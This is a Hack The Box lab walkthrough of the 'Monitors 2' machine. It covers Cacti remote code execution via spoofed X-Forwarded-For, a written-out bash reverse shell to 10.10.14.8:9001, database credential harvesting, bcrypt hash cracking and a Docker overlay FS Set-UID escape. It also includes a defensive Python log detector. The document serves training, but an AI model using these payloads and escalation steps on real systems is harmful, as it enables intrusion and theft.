Hack The Box - Monitoring 2 Exploit Walkthrough

Jul 24, 2024

IPPSEC: Monitoring 2 from Hack The Box

Overview

  • Target: Hack the Box machine named Monitors 2
  • Exploitation Summary: Gain an initial foothold through a vulnerable Cacti instance, SSH into the target system, work from inside a Docker container, and reach root by abusing a Docker weakness

Steps and Key Points

Initial Foothold

  1. Cacti Exploit

    • Service: Cacti version 1.2.2.2 at IP 10.10.11.211
    • Vulnerability: Remote code execution through remote_agent.php using specific GET parameters (action=polldata, poller_id, host_id, local_data_id) together with a spoofed X-Forwarded-For: 127.0.0.1 header
    • Metasploit & Python Scripts: Rather than running the Metasploit module or Python scripts blindly, understand the mechanics by sending the requests manually through a tool like Burp Suite
  2. Executing Payload

    • Payload: bash -c 'bash -i >& /dev/tcp/10.10.14.8/9001 0>&1' encoded and sent via Burp Suite
    • Acquiring Shell: The reverse shell connects back on the specified port, giving a shell inside the Docker container
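
A defender-side check for the request pattern just described, as an added example (not code from the video or the Cacti project): it scans constructed access-log lines for remote_agent.php polldata requests where X-Forwarded-For claims loopback from a remote peer or poller_id is not a plain integer. The log format with the client's X-Forwarded-For header appended as a trailing quoted field is an assumption.

```python
import re
from urllib.parse import urlparse, parse_qs

# Constructed sample access-log lines (Apache combined format with the client's
# X-Forwarded-For header appended as a final quoted field, an assumed log format).
SAMPLE_LOG = """\
10.10.14.8 - - [24/Jul/2024:10:00:01 +0000] "GET /remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_id=6 HTTP/1.1" 200 512 "-" "Mozilla/5.0" "127.0.0.1"
10.10.14.8 - - [24/Jul/2024:10:00:02 +0000] "GET /remote_agent.php?action=polldata&poller_id=1%3Bid&host_id=1&local_data_id=6 HTTP/1.1" 200 77 "-" "Mozilla/5.0" "127.0.0.1"
192.168.1.5 - - [24/Jul/2024:10:00:03 +0000] "GET /remote_agent.php?action=polldata&poller_id=1&host_id=1&local_data_id=6 HTTP/1.1" 200 512 "-" "cacti-poller" "-"
10.10.14.8 - - [24/Jul/2024:10:00:04 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0" "-"
"""

LINE_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)" "(?P<xff>[^"]*)"$'
)
LOOPBACK = {"127.0.0.1", "::1", "localhost"}


def analyse(log_text):
    """Return (timestamp, source_ip, reasons) for each suspicious polldata request."""
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # skip lines that do not match the assumed format
        url = urlparse(m["path"])
        if not url.path.endswith("/remote_agent.php"):
            continue
        qs = parse_qs(url.query)
        if qs.get("action") != ["polldata"]:
            continue
        reasons = []
        # Trust bypass: the header claims loopback while the TCP peer is remote.
        # (Tune LOOPBACK / the peer check if a reverse proxy legitimately sets XFF.)
        if m["xff"] in LOOPBACK and m["src"] not in LOOPBACK:
            reasons.append("loopback spoofed via X-Forwarded-For")
        # Heuristic: a genuine poller sends an integer poller_id; anything else is odd.
        for pid in qs.get("poller_id", []):
            if not pid.isdigit():
                reasons.append(f"non-numeric poller_id {pid!r}")
        if reasons:
            findings.append((m["ts"], m["src"], reasons))
    return findings


if __name__ == "__main__":
    for ts, src, reasons in analyse(SAMPLE_LOG):
        print(f"{ts} {src}: {'; '.join(reasons)}")
```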

Docker Environment

  1. Database Configuration

    • Credentials: Found in include/config.php — Username: root, Password: root
    • MySQL Connection: Connect to MySQL using the database hostname given in the configuration
    • User Data Extraction: Harvest user credentials from the Cacti database (user_auth table)
  2. Cracking Hashes

    • Hashes extracted from the user_auth table were cracked with hashcat after trying several modes; the hashes were identified as bcrypt
    • Cracked password: FunkyMonkey for user Marcus

Escalation via Docker

  1. Email with Vulnerability Information: An email on the system points to kernel, Cacti, and Docker vulnerabilities

    • Kernel vulnerability not applicable according to uname (5.4.0-1047 is not vulnerable)
    • Docker Vulnerability: Versions below 21.10.9 are affected by an overlay FS issue
    • Exploit Plan: Gain root in the Docker container, create a Set-UID executable, and use it on the host system
  2. Privilege Escalation

    • Capability Exploitation: The capsh binary is used to elevate privileges within the container
    • Steps: Copy bash to a temp directory, make it Set-UID and owned by root, and escalate with capsh --uid=0 --gid=0 --
    • Transferring Set-UID: Use the overlay FS so that the Set-UID executable created in the container is reachable from the host
  3. Achieving Root on Host

    • Run the modified bash with the -p flag so it keeps its Set-UID privileges, giving root on the host system
    • Access root.txt

Summary

  • Initial Access: Cacti remote code execution to Docker container
  • Privilege Escalation: Docker overlay FS to modify host filesystem, execute Set-UID binary
  • Result: Root access successfully achieved through a comprehensive exploitation path

Key Learnings

  • Flexibility and Understanding: Importance of understanding exploit mechanics rather than relying on scripts
  • Operational Awareness: Checking configurations and user data within compromised environments
  • Leveraging Capabilities: Utilizing available binaries and filesystem quirks (Docker overlay FS) for privilege escalation

Tools Used

  • Burp Suite
  • Metasploit & Manual Exploitation
  • MySQL and Linux command-line tools
  • Hashcat for password cracking
  • Docker container escape techniques